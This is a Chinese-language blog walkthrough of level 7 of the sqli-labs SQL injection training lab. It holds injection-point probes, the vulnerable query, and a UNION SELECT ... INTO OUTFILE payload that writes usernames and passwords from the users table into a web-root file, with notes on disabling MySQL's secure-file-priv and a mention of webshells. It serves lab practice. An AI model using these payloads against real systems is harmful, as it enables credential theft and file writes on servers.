sqli-labs基础篇【第七关】详细解析

这篇具有很好参考价值的文章主要介绍了sqli-labs基础篇【第七关】详细解析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Ⅰ 验证是否注入点

  从下面的注入测试来看,只有两种输出结果
  如果sql执行了,就会输出“You are in… Use outfile…”,反之输入“You have an error in your SQL syntax”

?id=1 --+   --You are in.... Use outfile......
?id=1' --+  -- You have an error in your SQL syntax
?id=-1' --+ --You have an error in your SQL syntax
?id=1\ --+  --You are in.... Use outfile......

查看是否存在双引号注入
正常输出,说明有执行,存在双引号注入

?id=1"  --+ -- You are in.... Use outfile......

查看是否存在闭合特殊符号

?id=1' and 1=1--+  -- 报错,sql没有执行,存在闭合
?id=1') and 1=1--+  --报错,还有一个闭合
?id=1')) and 1=1--+  -- 正常输出

推测注入点:双引号+两个闭合
image.png
image.png
看一下源码,确定是是双引号+单引号注入

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

构建个playload

?id=1')) --+ 

Ⅱ 爆出列数和回显位

常规注入,显示出列数和回显位

Ⅲ 注入开始

  根据提示,“You are in… Use outfile…”,可以使用文件上传漏洞,进行注入
注:也有用 一句话木马进行注入 ,在这里直接利用outfile,上传文件

(1)环境配置

  首先在进行文件上传漏洞注入前,先确定下自己的靶场环境,之前是使用线上的sqli-labs靶场,但是到了第七关就不好用了,因为我不知道线上靶场的web目录放在哪里,不好搞。
  所以用phpStudy+sqli-labs+linux,搭建了一个靶场,进行练习
正常情况下,phpStudy配置好,就可以运行sqli-labs
image.png

  但mysql注入的文件上传,需要有权限,需要在phpStudy上,对mysql进行设置,添加一个“secure-file-priv = ”,添加好了,就重启mysql
image.png

(2)注入格式

根据前面得出的可注入点,进行编写注入playload

index.php?id=-1')) union select 1,2,(XXXsql语句) 
									 into outfile  '/www/admin/localhost_80/wwwroot/sqli-labs/Less-7/4.txt' --+

  • XXXSQL语句:用之前的常规sql注入语句替换即可
  • outfile:后面接的是,注入页面的文件路径,以及输入的文件名

举个例子:爆数据

index.php?id=-1')) 
				union select 
				database(),
				user(),
				(select concat_ws('~',id,username,password) 
				from security.users limit 0,1) 
				into outfile  '/www/admin/localhost_80/wwwroot/sqli-labs/Less-7/4.txt' --+

image.png
image.png文章来源地址https://www.toymoban.com/news/detail-413895.html

到了这里,关于sqli-labs基础篇【第七关】详细解析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • SQLI-labs-第一关

    目录 知识点:单引号字符型注入 1、根据提示,为get注入,在url中输入内容​编辑  2、判断注入点  3、判断目前该表的字段数  4、判断回显位置 5、爆库名 6、爆表名   7、爆字段名  8、爆值 知识点:单引号字符型注入 思路: 1、根据提示,为get注入,在url中输入内容  

    2024年02月11日
    浏览(46)
  • sqli-labs例题复现

    less-1.1 在源码中$id=$_GET[\\\'id\\\'];之后加入如下代码: 1.分析正则 第一个b匹配select单词边界,sS匹配到所有字符,最后一个b匹配到from单词边界。 select...from被过滤,失效。 2.科学计数法的引入 如果可以存在一个,可以加在from前面,不会影响语句执行,从而实现绕过正则

    2024年02月10日
    浏览(48)
  • Sqli-Labs 通关笔记

    创建网站时选择php版本为5.x 修改./sql-connections/db-creds.inc 修改数据库用户名和密码,下面的数据库名不用管 任务目标:获取表名 Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) sql查询语句为 SELECT * FROM users WHERE id=\\\'$id\\\' LIMIT 0,1 输入 ?id=-1\\\' ,报错语句为

    2023年04月20日
    浏览(44)
  • sqli-labs通关详解

    找注入点,当输入id=1 and 1=2–+时没有变化,尝试单引号闭合找到注入类型 字符型注入,单引号闭合 判断字段数 找回显点 发现有两个回显点 开始信息收集(注意union前后格式要相同) 开始逐级爆破 爆破数据库 看源码或者尝试,没有闭合方式,说明为数字型注入 尝试找到注入

    2023年04月15日
    浏览(48)
  • sqli-labs部分关思路

    目录 updatexml 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 25a 26 26a 27 27a 28 28a 问题:你了解sql注入吗 答:由于程序过滤不严谨,用户异常输入,这些输入会导致数据库异常查询,最终导致sql注入 mysql三种注释符: --+ # /**/ updatexml() 这个函数作用是替换数据,三个参数对应

    2024年02月09日
    浏览(44)
  • sqli-labs关卡之一(两种做法)

    目录 一、布尔盲注(bool注入)  二、时间盲注(sleep注入) 页面没有报错和回显信息,只会返回正常或者不正常的信息,这时候就可以用布尔盲注 布尔盲注原理是先将你查询结果的第一个字符转换为ascii码,再与后面的数字比较,如果为真,整个查询条件就为真,返回正常的结果

    2024年02月09日
    浏览(115)
  • 【史上最全sqlmap通关sqli-labs靶场教程】

    下载sqlmap地址:sqlmap: automatic SQL injection and database takeover tool 下载完成后解压在C盘或者D盘都行,自己别忘了就可以 解压后在目标文件夹下打开cmd,运行python sqlmap.py -h 运行后出现sqlmap的说明,表示安装成功 ( 这里补充一下,-h其实不是完成的说明,-hh可以获得更多说明, )

    2024年01月19日
    浏览(39)
  • 安装sqli-labs时,mysql 8 报错解决

    首先执行命令Setup/reset Database for labs时,mysqlsql时报错: SETTING UP THE DATABASE SCHEMA AND POPULATING DATA IN TABLES: Warning : mysql_connect(): Server sent charset (255) unknown to the client. Please, report to the developers in  D:developnetworkSecurityphpStudyPHPTutorialWWWsqli-labssql-connectionssetup-db.php  on line  29 Warn

    2024年02月09日
    浏览(35)
  • Sqli-lab教程-史上最全详解(1-22通关)

    目录 Less-1 联合注入 Less-2 Less-3 Less-4 Less-5 报错注入/布尔盲注/时间盲注 Less-6 报错注入/布尔盲注/时间盲注 Less-7 文件导出 Less-8 布尔盲注/时间盲注 Less-9 时间盲注 Less-10 时间盲注 Less-11 post注入 Less-12 post注入 Less-13 post盲注 Less-14 post盲注 Less-15 时间盲注 Less-16 时间盲注 Less-17 修

    2024年02月14日
    浏览(47)
  • 注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)

    为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的 初学者学习 。本人之前 没有做过CTF ,也 没有学过 SQL注入, 零基础 ,所以 大佬可以先行离开 。 我的汇报内容是 SQL注入 XPath注入 HTML注入 另一篇文章讲HTML注入,例子给的比较简单,

    2024年02月16日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包